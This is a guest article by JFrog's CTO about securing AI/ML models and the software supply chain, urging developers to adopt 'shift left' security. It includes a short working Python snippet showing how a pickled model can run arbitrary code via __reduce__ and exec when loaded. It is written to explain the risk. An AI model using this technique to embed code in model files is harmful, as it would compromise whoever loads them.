From Innovation to Protection: Developers' Crucial Role in Securing AI and ML Models

Guest author Yoav Landman, Founder and CTO of JFrog, explains that while the potential for innovation with AI/ML is vast, it brings about heightened concerns for developers

Yoav Landman. Photo courtesy JFrog

As the scope of AI expands and large language models (LLMs) become more commonplace, developers are increasingly tasked with integrating AI and ML models into their software updates or developing entirely new software. While the potential for innovation with AI/ML is vast, it brings heightened concerns, as developers often struggle to prioritize secure development due to bandwidth constraints.

Lapses in security can unintentionally introduce malicious code into AI/ML models, opening the door for threat actors to lure developers into consuming compromised open-source (OSS) model variants, infiltrate corporate networks, and inflict further damage on an organization.

What’s more, developers are increasingly turning to generative AI to create code without knowing whether the code it generates is compromised, which further perpetuates security threats. Code must be vetted properly from the start to proactively mitigate threats to the software supply chain.

These threats will continue to plague security teams as threat actors seek out ways to exploit AI/ML models at every turn. As security threats rise in number and scale, 2024 will require developers to embrace security in their job functions and deploy the necessary safeguards to ensure resiliency for the organization.

Transforming the Developer Role

Integrating security considerations at the inception of the software lifecycle is a relatively recent practice for developers, and security at the binary level is often viewed as non-essential. Threat actors exploit this oversight, seeking ways to weaponize ML models against organizations by injecting malicious logic into the end binary.
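To see why a model binary is such an attractive target, consider that many ML models are distributed as Python pickle files, and pickle deserialization can run arbitrary code. The following minimal sketch (the class name, payload, and file name are purely illustrative) shows how a "model" file can carry a payload that executes the moment it is loaded:

```python
import pickle

# A pickled "model" can embed arbitrary code that runs the moment it is
# deserialized, because pickle invokes __reduce__ hooks during loading.
class MaliciousModel:
    def __reduce__(self):
        # Hypothetical payload: here it only writes a marker file, but a
        # real attacker could just as easily open a reverse shell.
        return (exec, ("open('pwned.txt', 'w').write('compromised')",))

payload = pickle.dumps(MaliciousModel())

# The victim believes this is a legitimate serialized model...
pickle.loads(payload)  # ...and the embedded code executes immediately.
```

No vulnerability in the victim's own code is required; simply loading the artifact is enough, which is why vetting model binaries themselves matters.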

Likewise, many developers lack the training to embed security into their code during the early stages of development. As a result, code generated by AI trained on open-source repositories is often not properly vetted for vulnerabilities and lacks the holistic security controls needed to protect users and their organizations from exploitation.

Though relying on such code might save time and other resources, developers are unwittingly exposing the organization to numerous risks. Once that code is implemented in AI/ML models, those exploits become more impactful and can go undetected.

As we advance into 2024, the conventional developer role must evolve to meet the demands of an ever-changing security landscape. Developers must assume the role of security professionals, blurring the lines between DevOps and DevSecOps. By incorporating secure solutions from the outset, developers not only optimize critical workflows but also instill confidence in organizational security.

"Shift Left" for Proactive Safeguards

The security of ML models must continue to evolve if security teams are to remain vigilant against threats in the new year. However, as AI gets implemented at scale, teams can’t afford to wait until later in the software lifecycle to identify the necessary security measures; by then, it might be too late.

Security leaders across the organization must embody the “shift left” mentality for software development. Adhering to this approach can ensure all components of the software development lifecycle are secure from the start and improve an organization’s security posture overall. When applied to AI/ML, shift-left not only verifies that code developed in external AI/ML systems is secure, but also ensures the AI/ML models being developed are free of malicious code and are license-compliant.

Approaching 2024 and beyond, threats surrounding AI and ML models will persist. Ensuring security is ingrained from the initiation of the software lifecycle will be critical for consistently thwarting attacks and safeguarding organizations and their customers.

Written by Yoav Landman, Founder and CTO of JFrog
